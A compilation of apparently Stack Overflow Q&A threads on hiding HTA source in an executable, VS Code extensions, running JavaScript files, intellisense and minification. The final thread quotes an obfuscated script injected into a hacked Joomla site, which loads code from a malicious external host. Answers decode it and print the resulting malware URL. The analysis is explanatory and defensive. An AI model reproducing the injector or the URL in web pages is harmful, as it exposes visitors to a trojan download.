I have searched far and wide for a way to compile my .hta file (and resources) to a .exe file.
There are plenty of applications that claim to be able to do this - but they have not worked for this application - which is a mixture of javascript and VB.
Simply, (and naively,) I don't want people looking at / screwing with the code. Any suggestions or solutions would be greatly appreciated.
EDIT: Of course, I understand that javascript and VB are not "compilable" since they are interpreted languages. I am just looking for a way to truly hide the source.
HTAEdit, which comes bundled with VBSedit, does not truly hide the hta code. At run time, it extracts the original hta file to a subdirectory in %temp% and passes it off to mshta.exe to execute. The converted exe's created by VBSedit don't seem to do this as far as I can tell.
Try using VBSedit, it definitely works for converting both vbs and hta to exe
You can "compile to exe" by simply wrapping the HTA into an executable which knows how to setup the HTA context/window.
The most trivial approach (which sounds like ExeScript) is to simply extract the HTA/resources first and then execute them. One could theoretically do this without temporary files by injecting data into a running IE context, but the task becomes more difficult. The internal JS may or may not be obfuscated and the wrapper may or may not add an additional layer of obfuscation/"encryption". (PayMo, and I am sure there are others, uses a wrapped context approach to distribute a single runnable exe).
If protecting "intellectual property" is the goal, hire a good lawyer :-)
I'm not sure about compiling to an exe - but if you minify & obfuscate your source code, unless you've got something incredibly valuable, it'd be a huge job to reverse-engineer.
http://developer.yahoo.com/yui/compressor/
Good luck.
You don't need a compiler, you need an encryptor/decryptor, like my project (under construction), the CFS project (Cryptographica File Security).
My clue is to create VBScript or JScript file for HTA to be dynamically spawned by. So you compile not HTA, but the script. This approach meets your security requirements much better than HTA packed to SFX.
Prepare the resources first - import to HTA all external files: scripts, stylesheets, and images (base64-encoded), to make your HTA standalone app. Then create eg VBScript file, and copy all HTML content from your HTA to the string variable in the script, replacing new line and tab symbols to " & vbCrLf & " and " & vbTab & ". Add code to create HTA window dynamically, .write() that string variable to the window's document, and quit script.
Note that Window_OnLoad() may not work properly due to pushing the content to window, that was already loaded.
Then just encrypt your completed VBScript to exe (using true encrypting utility, eg Primal Script 2012, ExeScript, VbsEdit or ScriptCryptor). And change icon with PE Explorer.
All that will take some time, but it is worth doing.
UPD: Here is an example of prepared script by the link.
Related
I have a question. I used vs code for python and I used some extensions for python like the python extension from microsoft. I currently want to use vs code for html,css and javascript. Does the pythons extensions affect my work in other languages and html and css? Do I need to disable them?
No. Extensions for languages are usually associated with a file type (.py, .css, etc.).
If the extentions you want to install in vscode dont depened on each other they will have seperated inner routines and frameworks. So no "collisions" or anything like that. In case of python you can have different environments per projects which can be tricky to handle. To learn more about that have a look at pyvenv or virtual environment.
It will have no effect, you don't need to disable it, because the extension only runs if you use a file format with .py
If your files are separated with their respective file type names attached (i.e. .css, .scss, .sass, .html, .py) the extensions designed for Python would theoretically only affect the Python files. If it's a really bad extension with low reviews maybe it would have a bug, but this is highly doubtful if you stick to highly-rated plugins. Simple.
No, they will not anithing. Because they are build to execute just with python files then any file that doesn't have (.py) at the end it will not be affected.
Ok, recently I started doing some tutorials in javascript. Soon I had finished doing some coding on notepad, saved it as " .js" but when I tried to open it I could not find a suitable program, hopefully, soomeone can tell me a method of running the code.
The first thing I did was try and download java, but quit the installer after seeing the ad based installer including vosteran, a web browser hijacker which I have had some experience with. Finally, is it necessary to download notepad ++ for this?
Thanks
It seems that you don't have a clear understanding of JavaScript and how it interacts with HTML. Java and JavaScript are two complete differently languages.
.js files are usually linked within a .html file or some server side language file, i.e. .php, .aspx. And the HTML file is opened with your browser, for example, Internet Explorer, Google Chrome or Firefox.
You should include the .js file in your HTML file using:
<script src="yourscript.js"></script>
Within the HTML file you can then invoke the methods and use the variables declared in your custom .js file.
You run js files in a webbrowser. Include files between tags.
Example:
There are two main options of running Javascript
1 In the browser
2 Or as a process
Choosing which one depends on your code. Please post an example of a what you are working on.
If your code fits option 1, then you will just need a small HTML file that includes reference to your javascript file.
If your code is not meant for a browser, you will likely need to install Nodejs. This is a CommonJS implementation of server-side js.
A note on Java and Javascript. They are in no way related. Netscape licensed the name from makers of Java and renamed language to Javascript in hopes it would inherate some of Java's popularity.
I have a website with very heavy (long javascript > 100KB + JQuery). So, for making the javascript re-useable, I want to separate the logic in different javascript files.
So, I want to make an aggregated javascript file
Please tell me how (I even want to use the VS2010 intellisense in my main JS file about the functions of the other JS files.)
Javascript Intellisense tends to be extremely unreliable as some updates broke it some updates fixed it, and there are a lot of extensions around it, breaking each other.
Still there is a /// <reference> element for cases like this.
See MSDN article and add line:
/// <reference path="otherscript.js" />
at the top of your script file.
Try to test it with the jQuery vsdoc and your other script files.
Also installing MVC4 installed some dependency or whatever that more-or-less fixed javascript intellisense for me.
I would recommend Resharper: http://www.jetbrains.com/resharper/whatsnew/
You can separate your Javascript files and use SquishIt to concatinate and compress/minify them all into one single file to reduce the file size and the number of requests.
I don´t know of any solution that allows you to work in both the concatinated file as well as each separated file ...and I don´t understand why anyone would want to.
IMO, Visual Studio has a quite poor intellisense for Javascript.
I have a fairly stand-alone page, and I'd like to make it as small as possible: inline minimized Javascript and minimized CSS, and then minimize the HTML itself. There's tools for each of these parts, but I'd like to avoid writing the glue for putting all of these together. Open source would be ideal.
try http://code.google.com/p/htmlcompressor/
EDIT
Although doing it will make the code reading part a lot more complex and as a result, debugging will be a big pain. Do it only after you have all the other required optimization in place.
I'm not sure if you're going to find one tool that does all, but I've seen a few that do get a decent job done..... for me normally combined with other tools though.
http://code.google.com/speed/page-speed/
Page speed is a firefox plugin, and is also an apache module
When you run Page Speed against a page
referencing HTML files, it
automatically runs the Page Speed HTML
compactor (which will in turn apply
JSMin and cssmin.js to any inline
JavaScript and CSS) on the files and
saves the minified output to a
configurable directory
Check out the Pretty Diff tool at http://prettydiff.com/?m=minify&html
You can also tell the tool to point to a given page with the s parameter, such as:
http://prettydiff.com/?m=minify&html&s=https://stackoverflow.com/
My Joomla! website has been repeatedly hacked into. Someone, somehow, managed to inject the following rubbish into the key php scripts, but I mean not to talk about configuring Joomla. The site is not visited much (at times I fear I might be the only visitor to that site...) and I don't care much to have the site back up and running. I'll handle that eventually.
My question is, how does this rubbish work? I look at it and I just don't see how does this manage to do any harm? What it does is it tries to download a PDF file called ChangeLog.pdf, which is infected with a trojan and after opening will freeze up your Acrobat and wreak havoc on your machine. How does it do that, I don't know, I don't care. But how does the following piece of script invoke the download?
<script>/*Exception*/ document.write('<script src='+'h#^(t#)((t$&#p#:)&/!$/)#d$y#^#$n#$d^!!&n#s$)^-$)o^^(r!#g!!#$.^^#g))!a#m##$e&$s^##!t##($!o#$p(.&#c&)#(o$m)).!$m$)y#(b#e()s&$t$#y&o$&(u#)$x&&^(i)-#^c!!&n$#.(#g)$e#(^n&!u(i&#&n(e&(!h&o#&^&l^$(l)&y$(##w!o#!((o#d&^.^#)r$#^u!!$:(##&8#)(0$8#&0^(/))s#o#^&#^f!$t$!o##n(&$i(^!c$(.!&c#o!&^m#&/&(s&$(o!f&!t#&o!!n)&i$&c!.#^^c)!$o##((m##/$^!g#^o$^&o&#g!l)###!e&.))c!)(o###^!m(&/^^l#^#i##(v&#e&)!$j^!a#$s#m!i)n$.!$c&$o)#$m^/#$v&i^d^()e(!o&&s#(z(#)^.#)c$&o^m)$)^/#$'.replace(/#|\$|#|\^|&|\(|\)|\!/ig, '')+' defer=defer></scr'+'ipt>');</script>
<!--6f471c20c9b96fed179c85ffdd3365cf-->
ESET has detected this code as JS/TrojanDownloader.Agent.NRO trojan
Notice the replace call after the giant messy string: .replace(/#|\$|#|\^|&|\(|\)|\!/ig, '').
It removes most of the special characters, turning it into a normal URL:
evil://dyndns-org.gamestop.com.mybestyouxi-cn.genuinehollywood.ru:8080/softonic.com/softonic.com/google.com/livejasmin.com/videosz.com/
(I manually changed http: to evil:)
Note that the regex could have been simplified to .replace(/[#$#^&()!]/ig, '')
If you look at the script, you'll see that it's a very simple script that injects a hidden IFRAME containing the path /index.php?ys from the same domain.
I requested that page in Fiddler, and it had no content.
These answers might help you understand the nature of the malicious JavaScript code but what you should be looking for is a way to close the loophole inherant in the Joomla engine. Pre-packaged frameworks are prone to loopholes, either intentional or unintentional, especially when you take into consideration that they are engineered to work on unix, mac and windows environments.
My work requires I run many domains, applications and frameworks on many types of servers and systems for clients and myself. Over time I've seen more and more bots crawling these systems looking for known loopholes/entrances by-way of back-door entrances created by those frameworks. Good thing when I use any type of framework, which I seldom do, I make sure to rename most if not the entire file structure to rid myself of those pesky loopholes/back-doors. At the very least you can rename directories which will throw off most bots, but my way is to completely eliminate references that give clues as to the nature of the framework, which includes renaming of the entire file structure not just directories. Always keep a map of the new naming conventions relative to the old naming conventions in order to make adding plug-ins to your base framework a snap. Once you get the hang of this you can go as far as programatically renaming the entire framework filestructure for quicker results, this is especially useful when having to deal with clients needing to be able to update their framework with plug-ins and the like.
It just does a regex replace on the script url to give you
NOTE: DO NOT FOLLOW THE BELOW LINK (inserted ** to deter the copy-pasters)
http**://dyndns-org.gamestop.com.mybestyouxi-cn.genuinehollywood.ru:8080/softonic.com/softonic.com/google.com/livejasmin.com/videosz.com/
as the src
It uses the replace function to replace the rubbish chars using regex, nothing wrong with the code:
........replace(/#|\$|#|\^|&|\(|\)|\!/ig, '')
Its load script from
h..p://dyndns-org.gamestop.com.mybestyouxi-cn.genuinehollywood.ru:8080/softonic.com/softonic.com/google.com/livejasmin.com/videosz.com/
And that script load iframe from with visibility hidden
h..p://dyndns-org.gamestop.com.mybestyouxi-cn.genuinehollywood.ru:8080/index.php?ys
When you read the whole thing, you find that it is a string followed by a replace command.
My two cents. Have you / can you install a Joomla backup tool such as Joomlapack?
I've set it to run via a CHRON script to keep the goods handy in case the muggers get to mugging.
What version of Joomla are you running?
1.0.X versions aren't being updated any longer, and it's age is really starting to show. You owe it to yourself to do a backup and plan to upgrade to 1.5 and anticipate the wonders of 1.6